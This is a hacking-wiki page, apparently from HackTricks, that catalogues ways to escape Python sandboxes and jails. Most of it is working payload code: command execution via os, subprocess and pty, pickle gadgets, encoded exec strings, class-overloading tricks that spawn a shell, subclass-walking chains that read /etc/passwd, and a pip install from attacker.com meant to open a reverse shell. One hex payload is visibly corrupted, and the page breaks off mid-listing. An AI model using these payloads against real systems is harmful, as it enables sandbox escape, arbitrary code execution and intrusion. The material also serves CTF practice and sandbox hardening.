# Bypass Python sandboxes ![](<../../../.gitbook/assets/image (9) (1) (2).png>) \ Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ Get Access Today: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
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These are some tricks to bypass python sandbox protections and execute arbitrary commands. ## Command Execution Libraries The first thing you need to know is if you can directly execute code with some already imported library, or if you could import any of these libraries: ```python os.system("ls") os.popen("ls").read() commands.getstatusoutput("ls") commands.getoutput("ls") commands.getstatus("file/path") subprocess.call("ls", shell=True) subprocess.Popen("ls", shell=True) pty.spawn("ls") pty.spawn("/bin/bash") platform.os.system("ls") pdb.os.system("ls") #Import functions to execute commands importlib.import_module("os").system("ls") importlib.__import__("os").system("ls") imp.load_source("os","/usr/lib/python3.8/os.py").system("ls") imp.os.system("ls") imp.sys.modules["os"].system("ls") sys.modules["os"].system("ls") __import__("os").system("ls") import os from os import * #Other interesting functions open("/etc/passwd").read() open('/var/www/html/input', 'w').write('123') #In Python2.7 execfile('/usr/lib/python2.7/os.py') system('ls') ``` Remember that the _**open**_ and _**read**_ functions can be useful to **read files** inside the python sandbox and to **write some code** that you could **execute** to **bypass** the sandbox. {% hint style="danger" %} **Python2 input()** function allows executing python code before the program crashes. {% endhint %} Python try to **load libraries from the current directory first** (the following command will print where is python loading modules from): `python3 -c 'import sys; print(sys.path)'` ![](<../../../.gitbook/assets/image (552).png>) ## Bypass pickle sandbox with the default installed python packages ### Default packages You can find a **list of pre-installed** packages here: [https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html](https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html)\ Note that from a pickle you can make the python env **import arbitrary libraries** installed in the system.\ For example, the following pickle, when loaded, is going to import the pip library to use it: ```python #Note that here we are importing the pip library so the pickle is created correctly #however, the victim doesn't even need to have the library installed to execute it #the library is going to be loaded automatically import pickle, os, base64, pip class P(object): def __reduce__(self): return (pip.main,(["list"],)) print(base64.b64encode(pickle.dumps(P(), protocol=0))) ``` For more information about how pickle works check this: [https://checkoway.net/musings/pickle/](https://checkoway.net/musings/pickle/) ### Pip package Trick shared by **@isHaacK** If you have access to `pip` or `pip.main()` you can install an arbitrary package and obtain a reverse shell calling: ```bash pip install http://attacker.com/Rerverse.tar.gz pip.main(["install", "http://attacker.com/Rerverse.tar.gz"]) ``` You can download the package to create the reverse shell here. Please, note that before using it you should **decompress it, change the `setup.py`, and put your IP for the reverse shell**: {% file src="../../../.gitbook/assets/reverse.tar.gz" %} {% hint style="info" %} This package is called `Reverse`. However, it was specially crafted so that when you exit the reverse shell the rest of the installation will fail, so you **won't leave any extra python package installed on the server** when you leave. {% endhint %} ## Eval-ing python code {% hint style="warning" %} Note that exec allows multiline strings and ";", but eval doesn't (check walrus operator) {% endhint %} If certain characters are forbidden you can use the **hex/octal/B64** representation to **bypass** the restriction: ```python exec("print('RCE'); __import__('os').system('ls')") #Using ";" exec("print('RCE')\n__import__('os').system('ls')") #Using "\n" eval("__import__('os').system('ls')") #Eval doesn't allow ";" eval(compile('print("hello world"); print("heyy")', '', 'exec')) #This way eval accept ";" __import__('timeit').timeit("__import__('os').system('ls')",number=1) #One liners that allow new lines and tabs eval(compile('def myFunc():\n\ta="hello word"\n\tprint(a)\nmyFunc()', '', 'exec')) exec(compile('def myFunc():\n\ta="hello word"\n\tprint(a)\nmyFunc()', '', 'exec')) ``` ```python #Octal exec("\137\137\151\155\160\157\162\164\137\137\50\47\157\163\47\51\56\163\171\163\164\145\155\50\47\154\163\47\51") #Hex exec("\x5f\x5f\x69\x6d\xIf youca70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x73\x79\x73\x74\x65\x6d\x28\x27\x6c\x73\x27\x29") #Base64 exec('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='.decode("base64")) #Only python2 exec(__import__('base64').b64decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk=')) ``` ### Other libraries that allow to eval python code ```python #Pandas import pandas as pd df = pd.read_csv("currency-rates.csv") df.query('@__builtins__.__import__("os").system("ls")') df.query("@pd.io.common.os.popen('ls').read()") df.query("@pd.read_pickle('')") # The previous options work but others you might try give the error: # Only named functions are supported # Like: df.query("@pd.annotations.__class__.__init__.__globals__['__builtins__']['eval']('print(1)')") ``` ## Operators and short tricks ```python # walrus operator allows generating variable inside a list ## everything will be executed in order ## From https://ur4ndom.dev/posts/2020-06-29-0ctf-quals-pyaucalc/ [a:=21,a*2] [y:=().__class__.__base__.__subclasses__()[84]().load_module('builtins'),y.__import__('signal').alarm(0), y.exec("import\x20os,sys\nclass\x20X:\n\tdef\x20__del__(self):os.system('/bin/sh')\n\nsys.modules['pwnd']=X()\nsys.exit()", {"__builtins__":y.__dict__})] ## This is very useful for code injected inside "eval" as it doesn't support multiple lines or ";" ``` ## Bypassing protections through encodings (UTF-7) In [**this writeup**](https://blog.arkark.dev/2022/11/18/seccon-en/#misc-latexipy) UFT-7 is used to load and execute arbitrary python code inside an apparent sandbox: ```python assert b"+AAo-".decode("utf_7") == "\n" payload = """ # -*- coding: utf_7 -*- def f(x): return x #+AAo-print(open("/flag.txt").read()) """.lstrip() ``` It is also possible to bypass it using other encodings, e.g. `raw_unicode_escape` and `unicode_escape`. ## Python execution without calls If you are inside a python jail that **doesn't allow you to make calls**, there are still some ways to **execute arbitrary functions, code** and **commands**. ### RCE with [decorators](https://docs.python.org/3/glossary.html#term-decorator) ```python # From https://ur4ndom.dev/posts/2022-07-04-gctf-treebox/ @exec @input class X: pass # The previous code is equivalent to: class X: pass X = input(X) X = exec(X) # So just send your python code when prompted and it will be executed # Another approach without calling input: @eval @'__import__("os").system("sh")'.format class _:pass ``` ### RCE creating objects and overloading If you can **declare a class** and **create an object** of that class you could **write/overwrite different methods** that can be **triggered** **without** **needing to call them directly**. #### RCE with custom classes You can modify some **class methods** (_by overwriting existing class methods or creating a new class_) to make them **execute arbitrary code** when **triggered** without calling them directly. ```python # This class has 3 different ways to trigger RCE without directly calling any function class RCE: def __init__(self): self += "print('Hello from __init__ + __iadd__')" __iadd__ = exec #Triggered when object is created def __del__(self): self -= "print('Hello from __del__ + __isub__')" __isub__ = exec #Triggered when object is created __getitem__ = exec #Trigerred with obj[] __add__ = exec #Triggered with obj + # These lines abuse directly the previous class to get RCE rce = RCE() #Later we will see how to create objects without calling the constructor rce["print('Hello from __getitem__')"] rce + "print('Hello from __add__')" del rce # These lines will get RCE when the program is over (exit) sys.modules["pwnd"] = RCE() exit() # Other functions to overwrite __sub__ (k - 'import os; os.system("sh")') __mul__ (k * 'import os; os.system("sh")') __floordiv__ (k // 'import os; os.system("sh")') __truediv__ (k / 'import os; os.system("sh")') __mod__ (k % 'import os; os.system("sh")') __pow__ (k**'import os; os.system("sh")') __lt__ (k < 'import os; os.system("sh")') __le__ (k <= 'import os; os.system("sh")') __eq__ (k == 'import os; os.system("sh")') __ne__ (k != 'import os; os.system("sh")') __ge__ (k >= 'import os; os.system("sh")') __gt__ (k > 'import os; os.system("sh")') __iadd__ (k += 'import os; os.system("sh")') __isub__ (k -= 'import os; os.system("sh")') __imul__ (k *= 'import os; os.system("sh")') __ifloordiv__ (k //= 'import os; os.system("sh")') __idiv__ (k /= 'import os; os.system("sh")') __itruediv__ (k /= 'import os; os.system("sh")') (Note that this only works when from __future__ import division is in effect.) __imod__ (k %= 'import os; os.system("sh")') __ipow__ (k **= 'import os; os.system("sh")') __ilshift__ (k<<= 'import os; os.system("sh")') __irshift__ (k >>= 'import os; os.system("sh")') __iand__ (k = 'import os; os.system("sh")') __ior__ (k |= 'import os; os.system("sh")') __ixor__ (k ^= 'import os; os.system("sh")') ``` #### Crating objects with [metaclasses](https://docs.python.org/3/reference/datamodel.html#metaclasses) The key thing that metaclasses allow us to do is **make an instance of a class, without calling the constructor** directly, by creating a new class with the target class as a metaclass. ```python # Code from https://ur4ndom.dev/posts/2022-07-04-gctf-treebox/ and fixed # This will define the members of the "subclass" class Metaclass(type): __getitem__ = exec # So Sub[string] will execute exec(string) # Note: Metaclass.__class__ == type class Sub(metaclass=Metaclass): # That's how we make Sub.__class__ == Metaclass pass # Nothing special to do Sub['import os; os.system("sh")'] ## You can also use the tricks from the previous section to get RCE with this object ``` #### Creating objects with exceptions When an **exception is triggered** an object of the **Exception** is **created** without you needing to call the constructor directly (a trick from [**@\_nag0mez**](https://mobile.twitter.com/\_nag0mez)): ```python class RCE(Exception): def __init__(self): self += 'import os; os.system("sh")' __iadd__ = exec #Triggered when object is created raise RCE #Generate RCE object # RCE with __add__ overloading and try/except + raise generated object class Klecko(Exception): __add__ = exec try: raise Klecko except Klecko as k: k + 'import os; os.system("sh")' #RCE abusing __add__ ## You can also use the tricks from the previous section to get RCE with this object ``` ### More RCE ```python # From https://ur4ndom.dev/posts/2022-07-04-gctf-treebox/ # If sys is imported, you can sys.excepthook and trigger it by triggering an error class X: def __init__(self, a, b, c): self += "os.system('sh')" __iadd__ = exec sys.excepthook = X 1/0 #Trigger it # From https://github.com/google/google-ctf/blob/master/2022/sandbox-treebox/healthcheck/solution.py # The interpreter will try to import an apt-specific module to potentially # report an error in ubuntu-provided modules. # Therefore the __import__ functions are overwritten with our RCE class X(): def __init__(self, a, b, c, d, e): self += "print(open('flag').read())" __iadd__ = eval __builtins__.__import__ = X {}[1337] ``` ### Read file with builtins help & license ```python __builtins__.__dict__["license"]._Printer__filenames=["flag"] a = __builtins__.help a.__class__.__enter__ = __builtins__.__dict__["license"] a.__class__.__exit__ = lambda self, *args: None with (a as b): pass ``` ![](<../../../.gitbook/assets/image (9) (1) (2).png>) \ Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ Get Access Today: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} ## Builtins * [**Builtins functions of python2**](https://docs.python.org/2/library/functions.html) * [**Builtins functions of python3**](https://docs.python.org/3/library/functions.html) If you can access the **`__builtins__`** object you can import libraries (notice that you could also use here other string representation shown in the last section): ```python __builtins__.__import__("os").system("ls") __builtins__.__dict__['__import__']("os").system("ls") ``` ### No Builtins When you don't have `__builtins__` you are not going to be able to import anything nor even read or write files as **all the global functions** (like `open`, `import`, `print`...) **aren't loaded**.\ However, **by default python imports a lot of modules in memory**. These modules may seem benign, but some of them are **also importing dangerous** functionalities inside of them that can be accessed to gain even **arbitrary code execution**. In the following examples you can observe how to **abuse** some of this "**benign**" modules loaded to **access** **dangerous** **functionalities** inside of them. **Python2** ```python #Try to reload __builtins__ reload(__builtins__) import __builtin__ # Read recovering in offset 40 ().__class__.__bases__[0].__subclasses__()[40]('/etc/passwd').read() # Write recovering in offset 40 ().__class__.__bases__[0].__subclasses__()[40]('/var/www/html/input', 'w').write('123') # Execute recovering __import__ (class 59s is ) ().__class__.__bases__[0].__subclasses__()[59]()._module.__builtins__['__import__']('os').system('ls') # Execute (another method) ().__class__.__bases__[0].__subclasses__()[59].__init__.__getattribute__("func_globals")['linecache'].__dict__['os'].__dict__['system']('ls') # Execute recovering eval symbol (class 59 is ) ().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]["eval"]("__import__('os').system('ls')") # Or you could obtain the builtins from a defined function get_flag.__globals__['__builtins__']['__import__']("os").system("ls") ``` #### Python3 ```python # Obtain builtins from a globally defined function # https://docs.python.org/3/library/functions.html print.__self__ dir.__self__ globals.__self__ len.__self__ # Obtain the builtins from a defined function get_flag.__globals__['__builtins__'] # Get builtins from loaded classes [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "builtins" in x.__init__.__globals__ ][0]["builtins"] ``` [**Below there is a bigger function**](./#recursive-search-of-builtins-globals) to find tens/**hundreds** of **places** were you can find the **builtins**. #### Python2 and Python3 ```python # Recover __builtins__ and make everything easier __builtins__= [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__ __builtins__["__import__"]('os').system('ls') ``` ### Builtins payloads ```python # Possible payloads once you have found the builtins __builtins__["open"]("/etc/passwd").read() __builtins__["__import__"]("os").system("ls") # There are lots of other payloads that can be abused to execute commands # See them below ``` ## Globals and locals Checking the **`globals`** and **`locals`** is a good way to know what you can access. ```python >>> globals() {'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': , '__spec__': None, '__annotations__': {}, '__builtins__': , 'attr': , 'a': , 'b': , 'c': , '__warningregistry__': {'version': 0, ('MetaPathFinder.find_module() is deprecated since Python 3.4 in favor of MetaPathFinder.find_spec() (available since 3.4)', , 1): True}, 'z': } >>> locals() {'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': , '__spec__': None, '__annotations__': {}, '__builtins__': , 'attr': , 'a': , 'b': , 'c': , '__warningregistry__': {'version': 0, ('MetaPathFinder.find_module() is deprecated since Python 3.4 in favor of MetaPathFinder.find_spec() (available since 3.4)', , 1): True}, 'z': } # Obtain globals from a defined function get_flag.__globals__ # Obtain globals from an object of a class class_obj.__init__.__globals__ # Obtaining globals directly from loaded classes [ x for x in ''.__class__.__base__.__subclasses__() if "__globals__" in dir(x) ] [] # Obtaining globals from __init__ of loaded classes [ x for x in ''.__class__.__base__.__subclasses__() if "__globals__" in dir(x.__init__) ] [, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ] # Without the use of the dir() function [ x for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__)] [, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ] ``` [**Below there is a bigger function**](./#recursive-search-of-builtins-globals) to find tens/**hundreds** of **places** were you can find the **globals**. ## Discover Arbitrary Execution Here I want to explain how to easily discover **more dangerous functionalities loaded** and propose more reliable exploits. #### Accessing subclasses with bypasses One of the most sensitive parts of this technique is being able to **access the base subclasses**. In the previous examples this was done using `''.__class__.__base__.__subclasses__()` but there are **other possible ways**: ```python #You can access the base from mostly anywhere (in regular conditions) "".__class__.__base__.__subclasses__() [].__class__.__base__.__subclasses__() {}.__class__.__base__.__subclasses__() ().__class__.__base__.__subclasses__() (1).__class__.__base__.__subclasses__() bool.__class__.__base__.__subclasses__() print.__class__.__base__.__subclasses__() open.__class__.__base__.__subclasses__() defined_func.__class__.__base__.__subclasses__() #You can also access it without "__base__" or "__class__" # You can apply the previous technique also here "".__class__.__bases__[0].__subclasses__() "".__class__.__mro__[1].__subclasses__() "".__getattribute__("__class__").mro()[1].__subclasses__() "".__getattribute__("__class__").__base__.__subclasses__() #If attr is present you can access everything as a string # This is common in Django (and Jinja) environments (''|attr('__class__')|attr('__mro__')|attr('__getitem__')(1)|attr('__subclasses__')()|attr('__getitem__')(132)|attr('__init__')|attr('__globals__')|attr('__getitem__')('popen'))('cat+flag.txt').read() (''|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fmro\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')(1)|attr('\x5f\x5fsubclasses\x5f\x5f')()|attr('\x5f\x5fgetitem\x5f\x5f')(132)|attr('\x5f\x5finit\x5f\x5f')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('popen'))('cat+flag.txt').read() ``` ### Finding dangerous libraries loaded For example, knowing that with the library **`sys`** it's possible to **import arbitrary libraries**, you can search for all the **modules loaded that have imported sys inside of them**: ```python [ x.__name__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ] ['_ModuleLock', '_DummyModuleLock', '_ModuleLockManager', 'ModuleSpec', 'FileLoader', '_NamespacePath', '_NamespaceLoader', 'FileFinder', 'zipimporter', '_ZipImportResourceReader', 'IncrementalEncoder', 'IncrementalDecoder', 'StreamReaderWriter', 'StreamRecoder', '_wrap_close', 'Quitter', '_Printer', 'WarningMessage', 'catch_warnings', '_GeneratorContextManagerBase', '_BaseExitStack', 'Untokenizer', 'FrameSummary', 'TracebackException', 'CompletedProcess', 'Popen', 'finalize', 'NullImporter', '_HackedGetData', '_localized_month', '_localized_day', 'Calendar', 'different_locale', 'SSLObject', 'Request', 'OpenerDirector', 'HTTPPasswordMgr', 'AbstractBasicAuthHandler', 'AbstractDigestAuthHandler', 'URLopener', '_PaddedFile', 'CompressedValue', 'LogRecord', 'PercentStyle', 'Formatter', 'BufferingFormatter', 'Filter', 'Filterer', 'PlaceHolder', 'Manager', 'LoggerAdapter', '_LazyDescr', '_SixMetaPathImporter', 'MimeTypes', 'ConnectionPool', '_LazyDescr', '_SixMetaPathImporter', 'Bytecode', 'BlockFinder', 'Parameter', 'BoundArguments', 'Signature', '_DeprecatedValue', '_ModuleWithDeprecations', 'Scrypt', 'WrappedSocket', 'PyOpenSSLContext', 'ZipInfo', 'LZMACompressor', 'LZMADecompressor', '_SharedFile', '_Tellable', 'ZipFile', 'Path', '_Flavour', '_Selector', 'JSONDecoder', 'Response', 'monkeypatch', 'InstallProgress', 'TextProgress', 'BaseDependency', 'Origin', 'Version', 'Package', '_Framer', '_Unframer', '_Pickler', '_Unpickler', 'NullTranslations'] ``` There are a lot, and **we just need one** to execute commands: ```python [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ][0]["sys"].modules["os"].system("ls") ``` We can do the same thing with **other libraries** that we know can be used to **execute commands**: ```python #os [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "os" in x.__init__.__globals__ ][0]["os"].system("ls") [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "os" == x.__init__.__globals__["__name__"] ][0]["system"]("ls") [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'os." in str(x) ][0]['system']('ls') #subprocess [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "subprocess" == x.__init__.__globals__["__name__"] ][0]["Popen"]("ls") [ x for x in ''.__class__.__base__.__subclasses__() if "'subprocess." in str(x) ][0]['Popen']('ls') [ x for x in ''.__class__.__base__.__subclasses__() if x.__name__ == 'Popen' ][0]('ls') #builtins [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "__bultins__" in x.__init__.__globals__ ] [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "builtins" in x.__init__.__globals__ ][0]["builtins"].__import__("os").system("ls") #sys [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ][0]["sys"].modules["os"].system("ls") [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'_sitebuiltins." in str(x) and not "_Helper" in str(x) ][0]["sys"].modules["os"].system("ls") #commands (not very common) [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "commands" in x.__init__.__globals__ ][0]["commands"].getoutput("ls") #pty (not very common) [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "pty" in x.__init__.__globals__ ][0]["pty"].spawn("ls") #importlib [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "importlib" in x.__init__.__globals__ ][0]["importlib"].import_module("os").system("ls") [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "importlib" in x.__init__.__globals__ ][0]["importlib"].__import__("os").system("ls") [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'imp." in str(x) ][0]["importlib"].import_module("os").system("ls") [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'imp." in str(x) ][0]["importlib"].__import__("os").system("ls") #pdb [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "pdb" in x.__init__.__globals__ ][0]["pdb"].os.system("ls") ``` Moreover, we could even search which modules are loading malicious libraries: ```python bad_libraries_names = ["os", "commands", "subprocess", "pty", "importlib", "imp", "sys", "builtins", "pip", "pdb"] for b in bad_libraries_names: vuln_libs = [ x.__name__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and b in x.__init__.__globals__ ] print(f"{b}: {', '.join(vuln_libs)}") """ os: CompletedProcess, Popen, NullImporter, _HackedGetData, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, HTTPConnection, MimeTypes, BlockFinder, Parameter, BoundArguments, Signature, _FragList, _SSHFormatECDSA, CertificateSigningRequestBuilder, CertificateBuilder, CertificateRevocationListBuilder, RevokedCertificateBuilder, _CallbackExceptionHelper, Context, Connection, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, Cookie, CookieJar, BaseAdapter, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _WrappedLock, Cache, ProblemResolver, _FilteredCacheHelper, FilteredCache, NullTranslations commands: subprocess: BaseDependency, Origin, Version, Package pty: importlib: NullImporter, _HackedGetData, BlockFinder, Parameter, BoundArguments, Signature, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path imp: sys: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, zipimporter, _ZipImportResourceReader, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, _wrap_close, Quitter, _Printer, WarningMessage, catch_warnings, _GeneratorContextManagerBase, _BaseExitStack, Untokenizer, FrameSummary, TracebackException, CompletedProcess, Popen, finalize, NullImporter, _HackedGetData, _localized_month, _localized_day, Calendar, different_locale, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, _LazyDescr, _SixMetaPathImporter, MimeTypes, ConnectionPool, _LazyDescr, _SixMetaPathImporter, Bytecode, BlockFinder, Parameter, BoundArguments, Signature, _DeprecatedValue, _ModuleWithDeprecations, Scrypt, WrappedSocket, PyOpenSSLContext, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, JSONDecoder, Response, monkeypatch, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _Framer, _Unframer, _Pickler, _Unpickler, NullTranslations, _wrap_close builtins: FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, Repr, Completer, CompletedProcess, Popen, _PaddedFile, BlockFinder, Parameter, BoundArguments, Signature pdb: """ ``` Moreover, if you think **other libraries** may be able to **invoke functions to execute commands**, we can also **filter by functions names** inside the possible libraries: ```python bad_libraries_names = ["os", "commands", "subprocess", "pty", "importlib", "imp", "sys", "builtins", "pip", "pdb"] bad_func_names = ["system", "popen", "getstatusoutput", "getoutput", "call", "Popen", "spawn", "import_module", "__import__", "load_source", "execfile", "execute", "__builtins__"] for b in bad_libraries_names + bad_func_names: vuln_funcs = [ x.__name__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) for k in x.__init__.__globals__ if k == b ] print(f"{b}: {', '.join(vuln_funcs)}") """ os: CompletedProcess, Popen, NullImporter, _HackedGetData, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, HTTPConnection, MimeTypes, BlockFinder, Parameter, BoundArguments, Signature, _FragList, _SSHFormatECDSA, CertificateSigningRequestBuilder, CertificateBuilder, CertificateRevocationListBuilder, RevokedCertificateBuilder, _CallbackExceptionHelper, Context, Connection, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, Cookie, CookieJar, BaseAdapter, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _WrappedLock, Cache, ProblemResolver, _FilteredCacheHelper, FilteredCache, NullTranslations commands: subprocess: BaseDependency, Origin, Version, Package pty: importlib: NullImporter, _HackedGetData, BlockFinder, Parameter, BoundArguments, Signature, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path imp: sys: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, zipimporter, _ZipImportResourceReader, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, _wrap_close, Quitter, _Printer, WarningMessage, catch_warnings, _GeneratorContextManagerBase, _BaseExitStack, Untokenizer, FrameSummary, TracebackException, CompletedProcess, Popen, finalize, NullImporter, _HackedGetData, _localized_month, _localized_day, Calendar, different_locale, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, _LazyDescr, _SixMetaPathImporter, MimeTypes, ConnectionPool, _LazyDescr, _SixMetaPathImporter, Bytecode, BlockFinder, Parameter, BoundArguments, Signature, _DeprecatedValue, _ModuleWithDeprecations, Scrypt, WrappedSocket, PyOpenSSLContext, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, JSONDecoder, Response, monkeypatch, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _Framer, _Unframer, _Pickler, _Unpickler, NullTranslations, _wrap_close builtins: FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, Repr, Completer, CompletedProcess, Popen, _PaddedFile, BlockFinder, Parameter, BoundArguments, Signature pip: pdb: system: _wrap_close, _wrap_close getstatusoutput: CompletedProcess, Popen getoutput: CompletedProcess, Popen call: CompletedProcess, Popen Popen: CompletedProcess, Popen spawn: import_module: __import__: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec load_source: NullImporter, _HackedGetData execfile: execute: __builtins__: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, zipimporter, _ZipImportResourceReader, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, _wrap_close, Quitter, _Printer, DynamicClassAttribute, _GeneratorWrapper, WarningMessage, catch_warnings, Repr, partialmethod, singledispatchmethod, cached_property, _GeneratorContextManagerBase, _BaseExitStack, Completer, State, SubPattern, Tokenizer, Scanner, Untokenizer, FrameSummary, TracebackException, _IterationGuard, WeakSet, _RLock, Condition, Semaphore, Event, Barrier, Thread, CompletedProcess, Popen, finalize, _TemporaryFileCloser, _TemporaryFileWrapper, SpooledTemporaryFile, TemporaryDirectory, NullImporter, _HackedGetData, DOMBuilder, DOMInputSource, NamedNodeMap, TypeInfo, ReadOnlySequentialNamedNodeMap, ElementInfo, Template, Charset, Header, _ValueFormatter, _localized_month, _localized_day, Calendar, different_locale, AddrlistClass, _PolicyBase, BufferedSubFile, FeedParser, Parser, BytesParser, Message, HTTPConnection, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, Address, Group, HeaderRegistry, ContentManager, CompressedValue, _Feature, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, _LazyDescr, _SixMetaPathImporter, Queue, _PySimpleQueue, HMAC, Timeout, Retry, HTTPConnection, MimeTypes, RequestField, RequestMethods, DeflateDecoder, GzipDecoder, MultiDecoder, ConnectionPool, CharSetProber, CodingStateMachine, CharDistributionAnalysis, JapaneseContextAnalysis, UniversalDetector, _LazyDescr, _SixMetaPathImporter, Bytecode, BlockFinder, Parameter, BoundArguments, Signature, _DeprecatedValue, _ModuleWithDeprecations, DSAParameterNumbers, DSAPublicNumbers, DSAPrivateNumbers, ObjectIdentifier, ECDSA, EllipticCurvePublicNumbers, EllipticCurvePrivateNumbers, RSAPrivateNumbers, RSAPublicNumbers, DERReader, BestAvailableEncryption, CBC, XTS, OFB, CFB, CFB8, CTR, GCM, Cipher, _CipherContext, _AEADCipherContext, AES, Camellia, TripleDES, Blowfish, CAST5, ARC4, IDEA, SEED, ChaCha20, _FragList, _SSHFormatECDSA, Hash, SHAKE128, SHAKE256, BLAKE2b, BLAKE2s, NameAttribute, RelativeDistinguishedName, Name, RFC822Name, DNSName, UniformResourceIdentifier, DirectoryName, RegisteredID, IPAddress, OtherName, Extensions, CRLNumber, AuthorityKeyIdentifier, SubjectKeyIdentifier, AuthorityInformationAccess, SubjectInformationAccess, AccessDescription, BasicConstraints, 